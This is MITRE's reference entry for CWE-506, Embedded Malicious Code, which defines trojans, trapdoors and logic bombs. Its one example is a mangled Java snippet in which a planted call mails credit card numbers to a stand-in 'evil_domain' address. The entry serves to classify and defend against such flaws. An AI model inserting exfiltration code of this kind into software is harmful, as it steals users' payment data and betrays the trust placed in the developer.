CWE-506: Embedded Malicious Code

Description

The product contains code that appears to be malicious in nature.

Submission Date :

July 19, 2006, midnight

Modification Date :

2023-10-26 00:00:00+00:00

Organization :

MITRE
Extended Description

Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.

Example Vulnerable Codes

Example - 1

In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.


// // Authorize credit card.// 
// ...// 
mailCardNumber(ccn, "evil_developer@evil_domain.com");boolean authorizeCard(String ccn) {}

Related Weaknesses

This table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined to give an overview of the different insight to similar items that may exist at higher and lower levels of abstraction.

CWE-507: Trojan Horse
Go to
CWE-510: Trapdoor
Go to
CWE-511: Logic/Time Bomb
Go to
CWE-512: Spyware
Go to
CWE-912: Hidden Functionality
Go to

Visit http://cwe.mitre.org/ for more details.